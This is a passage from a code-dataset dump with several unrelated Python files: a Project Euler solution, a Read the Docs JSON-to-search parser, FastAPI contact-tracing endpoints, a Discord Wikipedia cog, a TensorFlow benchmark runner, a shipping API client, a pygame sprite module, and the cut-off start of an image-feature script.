Pythagorean triplet for which a + b + c = 1000.\nFind the product abc.\n\"\"\"\nimport time\n\nstartTime = time.time()\n\n\ndef PythagoreanTriplet():\n for a in range(1,1000):\n for b in range(1,1000):\n c = 1000-a-b\n if(a**2 + b**2) == c**2:\n return a*b*c\n\n \n\nprint(PythagoreanTriplet())\n# numbers are 200,375,425 and multiplies 31875000\n\nendTime = time.time()\n\nprint(\"time {} \".format(endTime-startTime))\n","sub_path":"Problem9.py","file_name":"Problem9.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"323865850","text":"\"\"\"Functions related to converting content into dict/JSON structures.\"\"\"\n\nimport json\nimport logging\n\nfrom django.conf import settings\nfrom django.core.files.storage import get_storage_class\n\nfrom pyquery import PyQuery\n\n\nlog = logging.getLogger(__name__)\n\n\ndef generate_sections_from_pyquery(body, fjson_storage_path):\n \"\"\"Given a pyquery object, generate section dicts for each section.\"\"\"\n\n # Removing all
tags to prevent duplicate indexing with Sphinx Domains.\n try:\n # remove all
tags which contains
tags having 'id' attribute\n dt_tags = body('dt[id]')\n dt_tags.parents('dl').remove()\n except Exception:\n log.exception('Error removing
tags from file: %s', fjson_storage_path)\n\n # remove toctree elements\n try:\n body('.toctree-wrapper').remove()\n except Exception:\n log.exception('Error removing toctree elements from file: %s', fjson_storage_path)\n\n # Capture text inside h1 before the first h2\n h1_section = body('.section > h1')\n if h1_section:\n div = h1_section.parent()\n h1_title = h1_section.text().replace('¶', '').strip()\n h1_id = div.attr('id')\n h1_content = ''\n next_p = body('h1').next()\n while next_p:\n if next_p[0].tag == 'div' and 'class' in next_p[0].attrib:\n if 'section' in next_p[0].attrib['class']:\n break\n\n text = parse_content(next_p.text(), remove_first_line=True)\n if h1_content:\n h1_content = f'{h1_content.rstrip(\".\")}. {text}'\n else:\n h1_content = text\n\n next_p = next_p.next()\n if h1_content:\n yield {\n 'id': h1_id,\n 'title': h1_title,\n 'content': h1_content.replace('\\n', '. '),\n }\n\n # Capture text inside h2's\n section_list = body('.section > h2')\n for num in range(len(section_list)):\n div = section_list.eq(num).parent()\n header = section_list.eq(num)\n title = header.text().replace('¶', '').strip()\n section_id = div.attr('id')\n\n content = div.text()\n content = parse_content(content, remove_first_line=True)\n\n yield {\n 'id': section_id,\n 'title': title,\n 'content': content,\n }\n\n\ndef process_file(fjson_storage_path):\n \"\"\"Read the fjson file from disk and parse it into a structured dict.\"\"\"\n storage = get_storage_class(settings.RTD_BUILD_MEDIA_STORAGE)()\n\n log.debug('Processing JSON file for indexing: %s', fjson_storage_path)\n\n try:\n with storage.open(fjson_storage_path, mode='r') as f:\n file_contents = f.read()\n except IOError:\n log.info('Unable to read file: %s', fjson_storage_path)\n raise\n data = json.loads(file_contents)\n sections = []\n path = ''\n title = ''\n domain_data = {}\n\n if 'current_page_name' in data:\n path = data['current_page_name']\n else:\n log.info('Unable to index file due to no name %s', fjson_storage_path)\n\n if data.get('body'):\n body = PyQuery(data['body'])\n sections.extend(generate_sections_from_pyquery(body.clone(), fjson_storage_path))\n domain_data = generate_domains_data_from_pyquery(body.clone(), fjson_storage_path)\n else:\n log.info('Unable to index content for: %s', fjson_storage_path)\n\n if 'title' in data:\n title = data['title']\n title = PyQuery(data['title']).text().replace('¶', '').strip()\n else:\n log.info('Unable to index title for: %s', fjson_storage_path)\n\n return {\n 'path': path,\n 'title': title,\n 'sections': sections,\n 'domain_data': domain_data,\n }\n\n\ndef parse_content(content, remove_first_line=False):\n \"\"\"Removes new line characters and ¶.\"\"\"\n content = content.replace('¶', '').strip()\n\n # removing the starting text of each\n content = content.split('\\n')\n if remove_first_line and len(content) > 1:\n content = content[1:]\n\n # converting newlines to \". \"\n content = '. '.join([text.strip().rstrip('.') for text in content])\n return content\n\n\ndef _get_text_for_domain_data(desc_contents):\n \"\"\"Returns the text from the PyQuery object ``desc_contents``.\"\"\"\n # remove the 'dl', 'dt' and 'dd' tags from it\n # because all the 'dd' and 'dt' tags are inside 'dl'\n # and all 'dl' tags are already captured.\n desc_contents.remove('dl')\n desc_contents.remove('dt')\n desc_contents.remove('dd')\n\n # remove multiple spaces, new line characters and '¶' symbol.\n docstrings = parse_content(desc_contents.text())\n return docstrings\n\n\ndef generate_domains_data_from_pyquery(body, fjson_storage_path):\n \"\"\"\n Given a pyquery object, generate sphinx domain objects' docstrings.\n\n Returns a dict with the generated data.\n The returned dict is in the following form::\n\n {\n \"domain-id-1\": \"docstrings for the domain-id-1\",\n \"domain-id-2\": \"docstrings for the domain-id-2\",\n }\n \"\"\"\n\n domain_data = {}\n dl_tags = body('dl')\n\n for dl_tag in dl_tags:\n\n dt = dl_tag.findall('dt')\n dd = dl_tag.findall('dd')\n\n # len(dt) should be equal to len(dd)\n # because these tags go together.\n for title, desc in zip(dt, dd):\n try:\n id_ = title.attrib.get('id')\n if id_:\n # clone the PyQuery objects so that\n # the original one remains undisturbed\n docstrings = _get_text_for_domain_data(PyQuery(desc).clone())\n domain_data[id_] = docstrings\n except Exception:\n log.exception('Error parsing docstrings for domains in file %s', fjson_storage_path)\n\n return domain_data\n","sub_path":"readthedocs/search/parse_json.py","file_name":"parse_json.py","file_ext":"py","file_size_in_byte":5835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"420152701","text":"from typing import List\n\nfrom fastapi import APIRouter, Depends, HTTPException\nfrom fastapi.security import HTTPBasicCredentials\nfrom pydantic import BaseModel\n\nfrom .utils import get_or_404\nfrom ..db.firebase.firebase import Firebase, get_firebase\nfrom ..db.sql.database import Database\nfrom ..db.utils import get_db\nfrom ..security import check_handler_auth, security\n\nrouter = APIRouter()\n\n\nclass UserLookup(BaseModel):\n phone: str\n\n\nclass User(BaseModel):\n fuid: str\n status: str\n\n\n@router.post(\"/get-user\", response_model=User)\ndef get_user(lookup: UserLookup,\n credentials: HTTPBasicCredentials = Depends(security),\n firebase: Firebase = Depends(get_firebase),\n db: Database = Depends(get_db)):\n \"\"\"Find user by his phone number.\"\"\"\n check_handler_auth(db, credentials)\n user = get_or_404(firebase.get_user_by_phone(lookup.phone))\n return User(fuid=user[\"fuid\"], status=\"unknown\")\n\n\nclass ProximityRecord(BaseModel):\n buid: str\n start: int\n end: int\n status: str\n phone: str\n\n\n@router.get(\"/proximity/{fuid}\", response_model=List[ProximityRecord])\ndef get_proximity(fuid: str,\n credentials: HTTPBasicCredentials = Depends(security),\n firebase: Firebase = Depends(get_firebase),\n db: Database = Depends(get_db)):\n \"\"\"Return information about proximity of the given user\"\"\"\n check_handler_auth(db, credentials)\n records = get_or_404(firebase.get_proximity_records(fuid))\n return [ProximityRecord(\n buid=r[\"buid\"],\n start=r[\"timestampStart\"],\n end=r[\"timestampEnd\"],\n status=\"unknown\",\n phone=r[\"phoneNumber\"]\n ) for r in records]\n\n\nclass UserStatus(BaseModel):\n status: str\n\n\n@router.post(\"/change-user-status/{fuid}\")\ndef change_user_status(fuid: str,\n status: UserStatus,\n credentials: HTTPBasicCredentials = Depends(security),\n firebase: Firebase = Depends(get_firebase),\n db: Database = Depends(get_db)):\n \"\"\"Change the infected status of a user\"\"\"\n check_handler_auth(db, credentials)\n if not firebase.change_user_status(fuid, status.status):\n raise HTTPException(status_code=404)\n","sub_path":"src/btwa_api/app/api/endpoints.py","file_name":"endpoints.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"246644420","text":"# sp20-516-240 E.Cloudmesh.Common.3\n\n# Develop a program that demonstrates the use of FlatDict.\n\nfrom cloudmesh.common.FlatDict import FlatDict\n\nclass Common3:\n\n def doit(self):\n data = {\n 'name': 'Falconi',\n 'address': {\n 'city': 'Portland',\n 'state': 'OR'\n }\n }\n\n flat = FlatDict(data)\n print(f\"My name is {flat.name}\")\n print(f\"The City I live in is {flat.address__city}\")\n print(f\"The State I live in is {flat.address__state}\")\n\n\nif __name__ == \"__main__\":\n c = Common3()\n c.doit()\n","sub_path":"cloudmesh-exercises/e-cloudmesh-3.py","file_name":"e-cloudmesh-3.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"359967567","text":"import asyncio\nimport discord\nimport wikipedia\nimport textwrap\nfrom discord.ext import commands\nfrom Cogs import Settings\n\ndef setup(bot):\n\t# Add the bot\n\tbot.add_cog(Wiki(bot))\n\n# This is the Face module. It sends faces.\n\nclass Wiki:\n\n\t# Init with the bot reference, and a reference to the settings var\n\tdef __init__(self, bot):\n\t\tself.bot = bot\n\n\t@commands.command(pass_context=True)\n\tasync def wiki(self, ctx, *, search : str = None):\n\t\t\"\"\"Search Wikipedia!\"\"\"\n\t\tif search == None:\n\t\t\tawait ctx.channel.send(\"Usage: `{}wiki [search terms]`\".format(ctx.prefix))\n\t\t\treturn\n\t\t\n\t\tresults = wikipedia.search(search)\n\n\t\tif not len(results):\n\t\t\tawait ctx.channel.send(\"No results :(\")\n\t\t\treturn\n\n\t\t# Assume the first result\n\t\tnewSearch = results[0]\n\t\t# Try to get a hit\n\t\ttry:\n\t\t\twik = wikipedia.page(newSearch)\n\t\texcept wikipedia.DisambiguationError:\n\t\t\tawait ctx.channel.send(\"That search wasn't specific enough - try again with more detail.\")\n\t\t\treturn\n\n\t\t# Create our embed\n\t\twiki_embed = discord.Embed(color=ctx.author.color)\n\t\twiki_embed.title = wik.title\n\t\twiki_embed.url = wik.url\n\t\ttextList = textwrap.wrap(wik.content, 500, break_long_words=True, replace_whitespace=False)\n\t\twiki_embed.add_field(name=\"Wikipedia Results\", value=textList[0]+\"...\")\n\n\t\tawait ctx.channel.send(embed=wiki_embed)","sub_path":"Cogs/Wiki.py","file_name":"Wiki.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"48531155","text":"#!/usr/bin/env python\n\n\"\"\"\nBenchmark script for TensorFlow.\n\"\"\"\n\nfrom __future__ import print_function\n\nfrom absl import app\nfrom absl import flags as absl_flags\nimport tensorflow as tf\n\nimport benchmark_cnn\nimport cnn_util\nimport flags\nfrom cnn_util import log_fn\nimport pprint\n\nflags.define_flags()\nfor name in flags.param_specs.keys():\n absl_flags.declare_key_flag(name)\n\n\ndef main(positional_arguments):\n # Command-line arguments like '--distortions False' are equivalent to\n # '--distortions=True False', where False is a positional argument. To prevent\n # this from silently running with distortions, we do not allow positional\n # arguments.\n\n # For DGX servers use hierarchical_copy=True argument\n\n assert len(positional_arguments) >= 1\n if len(positional_arguments) > 1:\n raise ValueError('Received unknown positional arguments: %s'\n % positional_arguments[1:])\n\n tests_models = [\n {'num_gpus': None, 'batch_size': 64, 'variable_update': 'parameter_server', 'model': 'inception3'},\n {'num_gpus': None, 'batch_size': 64, 'variable_update': 'parameter_server', 'model': 'resnet50'},\n {'num_gpus': None, 'batch_size': 32, 'variable_update': 'parameter_server', 'model': 'resnet152'}, #batch=64 crashes\n {'num_gpus': None, 'batch_size': 64, 'variable_update': 'replicated', 'model': 'vgg16'},\n {'num_gpus': None, 'batch_size': 512, 'variable_update': 'replicated', 'model': 'alexnet'}\n ]\n\n test_gpus = [1, 2, 4, 8]\n\n stats = []\n for test in tests_models:\n for num_gpus in test_gpus:\n test['num_gpus'] = num_gpus\n\n params = benchmark_cnn.make_params_from_flags()\n params = benchmark_cnn.setup(params)\n\n # force --hierarchical_copy to False when using 1 GPU\n if num_gpus == 1:\n params = params._replace(hierarchical_copy=False)\n\n params = params._replace(num_gpus=test['num_gpus'],\n batch_size=test['batch_size'],\n model=test['model'],\n variable_update=test['variable_update']\n )\n\n bench = benchmark_cnn.BenchmarkCNN(params)\n\n tfversion = cnn_util.tensorflow_version_tuple()\n log_fn('TensorFlow: %i.%i' % (tfversion[0], tfversion[1]))\n\n bench.print_info()\n results = bench.run()\n # result\n # {\n # 'average_wall_time': 0.6646941304206848,\n # 'images_per_sec': 385.1395525908701,\n # 'last_average_loss': 7.256145,\n # 'num_steps': 100,\n # 'num_workers': 1\n # }\n stats.append({'test': test.copy(),\n 'result': results})\n\n\n # summary\n print('summary:')\n print('==========')\n pprint.pprint(stats)\n\n print('==========')\n s = ''\n for i in range(len(test_gpus)):\n for j in range(len(tests_models)):\n s += str(stats[i + j * len(test_gpus)]['result']['images_per_sec'])\n s += ', '\n s += '\\n'\n print(s)\n print('==========')\n\n\nif __name__ == '__main__':\n app.run(main) # Raises error on invalid flags, unlike tf.app.run()\n","sub_path":"scripts/tf_cnn_benchmarks/gpu_bench.py","file_name":"gpu_bench.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"178216678","text":"# Postmaster Python bindings\n# API docs at http://postmaster.io/docs\n# Author: Jesse Lovelace \n\nfrom .version import *\nfrom .http import *\nfrom .conf import config\n\ntry:\n import json\nexcept ImportError:\n try:\n import simplejson as json\n except ImportError:\n raise\n\n\nclass PostmasterObject(object):\n \"\"\"\n Base object for Postmaster. Allows slightly easlier access to data and\n some REST-like opertations.\n \"\"\"\n \n ARGS = []\n PATH = None\n \n def __init__(self, **kwargs):\n if self.ARGS:\n for k in kwargs.iterkeys():\n if not k in self.ARGS:\n raise TypeError('%s is an invalid argument for %s.' % (k, self.__class__.__name__))\n \n self._data = kwargs\n\n def __getattr__(self, name):\n if not name in self._data:\n raise AttributeError(\"Cannot find attribute.\")\n \n return self._data[name]\n \n def __repr__(self):\n return ' JSON: %s' % (self.__class__.__name__, id(self), self._data)\n\n def put(self, id_=None, action=None):\n \"\"\"\n Put object to server.\n \"\"\"\n if id_:\n response = HTTPTransport.put(\n action and '%s/%s/%s' % (self.PATH, id_, action) or \\\n '%s/%s' % (self.PATH, id_),\n self._data, headers=config.headers)\n else:\n response = HTTPTransport.post(self.PATH, self._data, headers=config.headers)\n return response\n \n def get(self, id_=None, action=None, params=None):\n \"\"\"\n Get object(s) from server.\n \"\"\"\n\n if id_:\n response = HTTPTransport.get(\n action and '%s/%s/%s' % (self.PATH, id_, action) or \\\n '%s/%s' % (self.PATH, id_), params, headers=config.headers)\n else:\n response = HTTPTransport.get(\n self.PATH, params, headers=config.headers)\n return response\n\n\nclass Tracking(PostmasterObject):\n pass\n\n\nclass Rate(PostmasterObject):\n PATH = '/v1/rates'\n\n\nclass TimeInTransit(PostmasterObject):\n PATH = '/v1/times'\n\n\nclass Address(PostmasterObject):\n\n PATH = '/v1/validate'\n\n def __init__(self, company=None, contact=None, line1=None, line2=None, line3=None, city=None, state=None, zip_code=None, country=None):\n kwargs = dict(\n company=company,\n contact=contact,\n line1=line1,\n city=city,\n state=state,\n zip_code=zip_code,\n country=country\n )\n if line2:\n kwargs['line2'] = line2\n if line3:\n kwargs['line3'] = line3\n super(Address, self).__init__(**kwargs)\n\n def validate(self):\n return self.put()\n\n\nclass Shipment(PostmasterObject):\n\n PATH = '/v1/shipments'\n\n @classmethod\n\n def create(cls, to, packages, service, from_=None, carrier=None, reference=None, options=None):\n \"\"\"\n Create a new shipment.\n\n Arguments:\n\n * to (required) - a dict representing the ship-to address:\n * company\n * contact\n * street - a list of strings defining the street address\n * city\n * state\n * zip\n * packages (required) - a dict (or list of dicts) representing the package:\n * weight\n * length\n * width\n * height\n * from (optional) - a dict representing the ship-from address.\n Will use default for account if not provided.\n * customs (optional)\n \"\"\"\n\n shipment = Shipment()\n shipment._data = {\n 'to': to,\n 'packages': packages,\n 'service': service,\n }\n\n if from_:\n shipment._data['from'] = from_\n if carrier:\n shipment._data['carrier'] = carrier\n if reference:\n shipment._data['reference'] = reference\n if options:\n shipment._data['options'] = options\n\n resp = shipment.put()\n\n shipment._data.update(resp)\n shipment.id = resp['id']\n\n return shipment\n\n @classmethod\n def retrieve(cls, package_id):\n \"\"\"\n Retrieve a package by ID.\n \"\"\"\n shipment = Shipment()\n shipment._data = shipment.get(package_id)\n return shipment\n\n def track(self):\n \"\"\"\n Track a shipment (from an object)\n \"\"\"\n return Tracking(**self.get(self.id, 'track'))\n\n def void(self):\n \"\"\"\n Void a shipment (from an object)\n \"\"\"\n self.put(self.id, 'void')\n\n\nclass Package(PostmasterObject):\n PATH = '/v1/packages'\n weight_units = ['LB', 'OZ', 'KG', 'G']\n size_units = ['IN', 'FT', 'CM', 'M']\n\n @classmethod\n def create(cls, width, height, length, weight=None, weight_units='LB', size_units='IN', name=None):\n \"\"\"\n Create a new box.\n\n Arguments:\n\n * width (required) - The width of the box.\n * height (required) - The height of the box.\n * length (required) - The length of the box.\n * weight The weight of the box.\n * weight_units - The units used to measure weight. LB, OZ, KG, or G\n * size_units - The units used to measure sizes. IN, FT, CM, or M\n * name - A memorable name.\n \"\"\"\n\n box = Package()\n box._data = {\n 'width': width,\n 'height': height,\n 'length': length,\n }\n\n if weight:\n box._data['weight'] = weight\n if weight_units in cls.weight_units:\n box._data['weight_units'] = weight_units\n if size_units in cls.size_units:\n box._data['size_units'] = size_units\n if name:\n box._data['name'] = name\n\n resp = box.put()\n\n box._data.update(resp)\n box.id = resp['id']\n\n return box\n\n @classmethod\n def list(cls, limit=10, cursor=None):\n \"\"\"\n Retrieve a list of all user-defined box types.\n\n Arguments:\n\n * limit (optional) - Number of boxes to get. Default 10.\n * cursor (optional) - Cursor offset.\n \"\"\"\n\n boxes = Package()\n resp = boxes.get()\n\n boxes._data.update(resp)\n\n return boxes\n\n @classmethod\n def fit(cls, items, packages=None, package_limit=None):\n \"\"\"\n Given a set of box types, try to fill it optimally.\n\n Arguments:\n\n * items (required) - A list of items (dicts) to fit into the box.\n * width (required)\n * height (required)\n * length (required)\n * weight\n * weight_units - Choices: LB, OZ, KG, or G.\n * size_units - Choices: IN, FT, CM, or M.\n * name\n * sku\n * packages (optional) - A list of package types to use. (Default is use API boxes).\n * width (required)\n * height (required)\n * length (required)\n * weight\n * weight_units - Choices: LB, OZ, KG, or G.\n * size_units - Choices: IN, FT, CM, or M.\n * package_limit (optional) - A maximum number of packages to create.\n \"\"\"\n\n fit = Package()\n fit.PATH += '/fit'\n fit._data = {'items': items}\n if packages:\n fit._data['packages'] = packages\n if package_limit:\n fit._data['package_limit'] = package_limit\n\n resp = fit.put()\n\n fit._data.update(resp)\n\n return fit\n\n\ndef track_by_reference(tracking_number):\n \"\"\"\n Track any package by it's carrier-specific tracking number.\n Note: if this package was not shipped my Postmaster\n the resulting data will not contain detailed information\n about the shipment.\n \"\"\"\n return HTTPTransport.get('/v1/track', dict(tracking=tracking_number))\n\n\ndef validate_address(address_object):\n \"\"\"\n Validate that an address is correct.\n \"\"\"\n pass\n\n\ndef get_transit_time(from_zip, to_zip, weight, carrier=None):\n \"\"\"\n Find the time needed for a package to get from point A to point B\n \"\"\"\n tit = TimeInTransit(\n from_zip=from_zip,\n to_zip=to_zip,\n weight=weight,\n carrier=carrier,\n )\n return tit.put()\n\n\ndef get_rate(carrier, to_zip, weight, from_zip=None, service='ground'):\n \"\"\"\n Find the cost to ship a package from point A to point B.\n \"\"\"\n rate = Rate(\n from_zip=from_zip,\n to_zip=to_zip,\n weight=weight,\n carrier=carrier,\n service=service,\n )\n\n return rate.put()\n\n\ndef get_token():\n return HTTPTransport.get('/v1/token')\n","sub_path":"postmaster/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"215135381","text":"from math import sin, cos, radians\nimport random\nimport itertools\nimport pygame as pg\n\nimport prepare\nimport tools\n\n\ndef footprint_collide(left, right):\n \"\"\"\n Checks for collision between two sprites using their footprint rects instead of\n their image rects. Used as callback for sprite collision detection methods.\n \"\"\"\n return left.footprint.colliderect(right.footprint)\n\n \nSPRITE_SIZE = (32, 36)\n\n\nclass RPGSprite(pg.sprite.DirtySprite):\n \"\"\"Base class for player and AI sprites.\"\"\"\n def __init__(self, pos, speed, footprint_size, name, facing=\"DOWN\", *groups):\n super(RPGSprite, self).__init__(*groups)\n self.speed = speed\n self.name = name\n self.direction = facing\n self.old_direction = None \n self.direction_stack = [] \n self.redraw = True \n self.animate_timer = 0.0\n self.animate_fps = 10.0\n self.walkframes = None\n self.walkframe_dict = self.make_frame_dict(self.get_frames(name))\n self.adjust_images()\n self.rect = self.image.get_rect(midbottom=pos)\n #rect for collision detection\n self.footprint = pg.Rect((0,0), footprint_size)\n self.footprint.midbottom = self.rect.midbottom\n self.dirty = 1\n\n def get_frames(self, character):\n \"\"\"Get a list of all frames.\"\"\"\n sheet = prepare.GFX[\"characters\"][character]\n all_frames = tools.split_sheet(sheet, SPRITE_SIZE, 3, 4)\n return all_frames\n\n def make_frame_dict(self, frames):\n \"\"\"Create a dictionary of animation cycles for each direction.\"\"\"\n frame_dict = {}\n for i,direct in enumerate(prepare.DIRECTIONS):\n frame_dict[direct] = itertools.cycle([frames[i][0], frames[i][2]])\n return frame_dict\n\n def wrap_move(self, screen_rect):\n \"\"\"\n Move sprite's rect and footprint to opposite side of\n screen if rect is completely off-screen.\n \"\"\"\n if self.rect.right < 0:\n self.rect.move_ip((screen_rect.width, 0))\n self.dirty = 1\n elif self.rect.left > screen_rect.right:\n self.rect.move_ip((-screen_rect.width, 0))\n self.dirty = 1\n elif self.rect.bottom < 0:\n self.rect.move_ip((0, screen_rect.height))\n self.dirty = 1\n elif self.rect.top > screen_rect.bottom:\n self.rect.move_ip((0, -screen_rect.height))\n self.dirty = 1\n self.footprint.midbottom = self.rect.midbottom\n \n def screen_wrap(self, screen_rect, all_sprites, wrapped_sprites):\n \"\"\"\n Create a temporary sprite to display the portion of self.image\n that is off-screen and adds it to all_sprites for drawing and\n wrapped_sprites for culling on the next tick.\n \"\"\" \n x, y = self.rect.topleft\n w, h = self.rect.size\n if self.rect.left < 0:\n sub_rect = pg.Rect((0, 0), (abs(x), h))\n wrap_rect = pg.Rect((screen_rect.right + x, y), sub_rect.size)\n elif self.rect.right > screen_rect.right:\n sub_w = self.rect.right - screen_rect.right\n sub_rect = pg.Rect((w - sub_w, 0), (sub_w, h))\n wrap_rect = pg.Rect((0, y), sub_rect.size)\n elif self.rect.top < 0:\n sub_rect = pg.Rect((0, 0), (w, abs(y)))\n wrap_rect = pg.Rect((x, screen_rect.bottom + y), sub_rect.size)\n elif self.rect.bottom > screen_rect.bottom:\n sub_h = self.rect.bottom - screen_rect.bottom\n sub_rect = pg.Rect((0, h - sub_h), (w, sub_h))\n wrap_rect = pg.Rect((x, 0), sub_rect.size)\n \n sprite = pg.sprite.DirtySprite(all_sprites, wrapped_sprites)\n sprite.image = self.image.subsurface(sub_rect)\n sprite.rect = wrap_rect\n sprite.dirty = 1\n all_sprites.change_layer(sprite, sprite.rect.bottom)\n self.dirty = 1\n \n def adjust_images(self, now=0):\n \"\"\"Update the sprite's walkframes as the sprite's direction changes.\"\"\"\n if self.direction != self.old_direction:\n self.walkframes = self.walkframe_dict[self.direction]\n self.old_direction = self.direction\n self.redraw = True\n self.make_image(now)\n\n def make_image(self, now):\n \"\"\"Update the sprite's animation as needed.\"\"\"\n if self.redraw or now-self.animate_timer > 1000/self.animate_fps:\n self.image = next(self.walkframes)\n self.animate_timer = now\n self.dirty = 1\n self.redraw = False\n\n def add_direction(self, direction):\n \"\"\"\n Add direction to the sprite's direction stack and change current\n direction.\n \"\"\"\n if direction in self.direction_stack:\n self.direction_stack.remove(direction)\n self.direction_stack.append(direction)\n self.direction = direction\n\n def pop_direction(self, direction):\n \"\"\"\n Remove direction from direction stack and change current direction\n to the top of the stack (if not empty).\n \"\"\"\n if direction in self.direction_stack:\n self.direction_stack.remove(direction)\n if self.direction_stack:\n self.direction = self.direction_stack[-1]\n \n def bounce(self, rect, direction, bounce_amount=4):\n \"\"\"\n Bounce sprite off an obstacle by bounce amount in the opposite\n direction the sprite is travelling. \n \"\"\"\n offsets = {\"LEFT\": (rect.right - (self.footprint.left - bounce_amount), 0),\n \"RIGHT\": (rect.left - (self.footprint.right + bounce_amount), 0),\n \"UP\": (0, rect.bottom - (self.footprint.top - bounce_amount)),\n \"DOWN\": (0, rect.top - (self.footprint.bottom + bounce_amount))}\n self.rect.move_ip(offsets[direction])\n self.footprint.midbottom = self.rect.midbottom\n \n def update(self, now, screen_rect, all_sprites, wrapped_sprites):\n \"\"\"Update image and position of sprite.\"\"\"\n self.adjust_images(now)\n self.wrap_move(screen_rect)\n if self.rect.clamp(screen_rect) != self.rect:\n self.screen_wrap(screen_rect, all_sprites, wrapped_sprites)\n self.dirty = 1\n \n if self.direction_stack:\n direction_vector = prepare.DIRECT_DICT[self.direction]\n self.rect.x += self.speed*direction_vector[0]\n self.rect.y += self.speed*direction_vector[1]\n self.dirty = 1\n self.footprint.midbottom = self.rect.midbottom\n \n def draw(self, surface):\n \"\"\"Draw sprite to surface (not used if using group draw functions).\"\"\"\n return surface.blit(self.image, self.rect)\n \n\nclass Player(RPGSprite):\n \"\"\"This class will represent the user controlled character.\"\"\"\n def __init__(self, pos, speed, footprint_size, name=\"warrior_m\", facing=\"DOWN\", *groups):\n super(Player, self).__init__(pos, speed, footprint_size, name, facing, *groups)\n\n def get_event(self, event):\n \"\"\"Handle events pertaining to player control.\"\"\"\n if event.type == pg.KEYDOWN:\n self.add_direction(event.key)\n elif event.type == pg.KEYUP:\n self.pop_direction(event.key)\n\n def update(self, now, screen_rect, all_sprites, wrapped_sprites):\n \"\"\"Call base classes update method and clamp player to screen.\"\"\"\n super(Player, self).update(now, screen_rect, all_sprites, wrapped_sprites)\n \n def collide_with_walls(self, walls):\n \"\"\"\n Bounce off the first wall in walls (a list of allwalls that the sprite collides with).\n Only responding to one collision per tick avoids rattling around in corners or\n \"bouncing\" multiple times.\n \"\"\" \n self.bounce(walls[0].footprint, self.direction)\n\n def add_direction(self, key):\n \"\"\"Remove direction from stack if corresponding key is released.\"\"\"\n if key in prepare.CONTROLS:\n super(Player, self).add_direction(prepare.CONTROLS[key])\n\n def pop_direction(self, key):\n \"\"\"Add direction to stack if corresponding key is pressed.\"\"\"\n if key in prepare.CONTROLS:\n super(Player, self).pop_direction(prepare.CONTROLS[key])\n\n\nclass AISprite(RPGSprite):\n \"\"\"A non-player controlled sprite.\"\"\"\n def __init__(self, pos, speed, footprint_size, name, facing, *groups):\n super(AISprite, self).__init__(pos, speed, footprint_size, name, facing, *groups)\n self.wait_range = (500, 2000)\n self.wait_delay = random.randint(*self.wait_range)\n self.wait_time = 0.0\n self.change_direction()\n\n def update(self, now, screen_rect, all_sprites, wrapped_sprites):\n \"\"\"\n Choose a new direction if wait_time has expired or the sprite\n attempts to leave the screen.\n \"\"\"\n if now-self.wait_time > self.wait_delay:\n self.change_direction(now)\n super(AISprite, self).update(now, screen_rect, all_sprites, wrapped_sprites)\n \n def collide_with_walls(self, walls):\n \"\"\"\n Bounce off the first wall in walls (a list of allwalls that the sprite collides with)\n and change direction to something other than the sprite's current direction.\n \"\"\"\n self.bounce(walls[0].footprint, self.direction)\n self.change_direction(restricted=self.direction)\n \n def change_direction(self, now=0, restricted=None):\n \"\"\"\n Empty the stack and choose a new direction. The sprite may also\n choose not to go idle (choosing direction=None). Passing a direction\n as restricted eliminates that direction and None from the possible\n new directions.\n \"\"\"\n self.direction_stack = []\n directions = list(prepare.DIRECTIONS + (None, ))\n if restricted:\n directions.remove(restricted)\n directions.remove(None)\n direction = random.choice(directions)\n if direction:\n super(AISprite, self).add_direction(direction)\n \n self.wait_delay = random.randint(*self.wait_range)\n self.wait_time = now\n\n\nclass Obstacle(pg.sprite.DirtySprite):\n def __init__(self, pos, footprint_size, *groups):\n super(Obstacle, self).__init__(*groups)\n self.image = prepare.GFX[\"stone\"]\n self.rect = self.image.get_rect(topleft=pos)\n self.footprint = pg.Rect((0,0), footprint_size)\n self.footprint.midbottom = self.rect.midbottom\n","sub_path":"actors.py","file_name":"actors.py","file_ext":"py","file_size_in_byte":10498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"} +{"seq_id":"172471312","text":"import numpy as np\nimport os\nfrom smac.configspace import ConfigurationSpace\nfrom ConfigSpace.hyperparameters import CategoricalHyperparameter, UniformFloatHyperparameter, UniformIntegerHyperparameter\nfrom ConfigSpace.conditions import InCondition\nfrom smac.tae.execute_func import ExecuteTAFuncDict\nfrom smac.scenario.scenario import Scenario\nfrom smac.facade.smac_facade import SMAC\nfrom sklearn.model_selection import train_test_split\nfrom mahotas.features import haralick\nimport cv2\n# from keras.applications.vgg19 import VGG19\n# from keras.applications.inception_v3 import InceptionV3\n# from keras.applications.vgg19 import preprocess_input\nfrom sklearn.decomposition import PCA\nfrom sklearn.manifold import Isomap\nfrom sklearn import svm\nfrom sklearn.ensemble import RandomForestClassifier\nfrom mahotas.features import surf\nimport pickle\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn import metrics\nfrom sklearn.preprocessing import Normalizer\n\ndataset = 'breast'\n\ndef haralick_all_features(X, distance=1):\n\tf = []\n\tfor i in range(len(X)):\n\t\tI = cv2.imread(X[i])\n\t\tif I is None or I.size == 0 or np.sum(I[:]) == 0 or I.shape[0] == 0 or I.shape[1] == 0:\n\t\t\th = np.zeros((1, 13))\n\t\telse:\n\t\t\tI = cv2.cvtColor(I, cv2.COLOR_BGR2GRAY)\n\t\t\th = haralick(I, distance=distance, return_mean=True, ignore_zeros=False)\n\t\t\th = np.expand_dims(h, 0)\n\t\tif i == 0:\n\t\t\tf = h\n\t\telse:\n\t\t\tf = np.vstack((f, h))\n\treturn f\n\ndef surf_all_features(X, octaves=4, scales=6):\n\tf = []\n\tfor i in 